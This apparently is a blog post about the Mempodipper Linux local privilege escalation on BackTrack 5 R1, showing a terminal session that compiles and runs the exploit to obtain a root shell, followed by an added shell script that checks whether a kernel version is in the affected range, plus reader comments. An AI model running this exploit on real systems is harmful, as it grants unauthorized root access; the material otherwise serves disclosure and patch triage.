Backtrack 5 kernel whoops !!

Hackers For Charity

If you run BackTrack 5 R1 as a non-root user (and apparently on many other Linux kernels >= 2.6.39), you can get root through a Linux local privilege escalation via SUID /proc/pid/mem write. Read more on the blog. Exploit code can be obtained here.

chalo@bt:~$ uname -a
Linux bt #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami
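A version-triage check for this bug, added here as an example (it is not part of the original post and not Mempodipper code): it takes the lower bound the post gives (2.6.39) plus a fixed-in version you supply from your distribution's advisory, and reports whether a kernel's uname -r string falls in the affected range. The function names strip_version, version_le and mem_write_affected and the FIXED_IN variable are constructed for this example. Distributions backport fixes without changing the base version, so a match is a lead to confirm against the vendor advisory, not proof.

```shell
#!/bin/sh
# Added example (not from the original post or from mempodipper): triage whether a
# kernel version string falls in the range affected by the /proc/pid/mem write bug.
# The lower bound 2.6.39 comes from the post; the fixed-in version is supplied by
# the caller from the distribution's advisory, since stable branches and distros
# differ. Function names and the FIXED_IN variable are constructed for this example.

AFFECTED_FROM=2.6.39

# strip_version: keep only the leading digits-and-dots part of a uname -r string,
# e.g. "3.2.0-23-generic" -> "3.2.0"
strip_version() {
    printf '%s\n' "${1%%[!0-9.]*}"
}

# version_le A B: exit 0 if A <= B, comparing dot-separated fields as integers;
# missing trailing fields count as 0, so 2.6.39 <= 2.6.39.4
version_le() {
    vl_a=$1
    vl_b=$2
    while [ -n "$vl_a" ] || [ -n "$vl_b" ]; do
        vl_af=${vl_a%%.*}
        if [ "$vl_af" = "$vl_a" ]; then vl_a=; else vl_a=${vl_a#*.}; fi
        vl_bf=${vl_b%%.*}
        if [ "$vl_bf" = "$vl_b" ]; then vl_b=; else vl_b=${vl_b#*.}; fi
        vl_af=${vl_af:-0}
        vl_bf=${vl_bf:-0}
        [ "$vl_af" -lt "$vl_bf" ] && return 0
        [ "$vl_af" -gt "$vl_bf" ] && return 1
    done
    return 0
}

# mem_write_affected RUNNING FIXED: print "affected" when
# AFFECTED_FROM <= RUNNING < FIXED, otherwise "not-affected"
mem_write_affected() {
    mwa_v=$(strip_version "$1")
    mwa_fixed=$(strip_version "$2")
    if version_le "$AFFECTED_FROM" "$mwa_v" && ! version_le "$mwa_fixed" "$mwa_v"; then
        echo affected
    else
        echo not-affected
    fi
}

# Usage: FIXED_IN=<fixed-in version from your vendor's advisory> sh thisfile.sh
# The value is a placeholder you must fill in; without it the check refuses to guess.
if [ -n "$(strip_version "${FIXED_IN:-}")" ]; then
    echo "$(uname -r): $(mem_write_affected "$(uname -r)" "$FIXED_IN")"
else
    echo "set FIXED_IN to the fixed-in kernel version from your distribution's advisory" >&2
fi
```

The comparison is deliberately pure POSIX sh (no sort -V, no bash arrays) so it runs on a minimal rescue shell; the suffix stripping is what makes distribution strings such as "3.2.0-23-generic" comparable at all, and it is also why a distribution's backported fix is invisible to this check.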


3 Responses to Backtrack 5 kernel whoops !!

  1. G1 says:

    Hey – I noticed your posting. I created a proof of concept video on this.

  2. Aircrack Ng says:

    great video johnny ..thanks
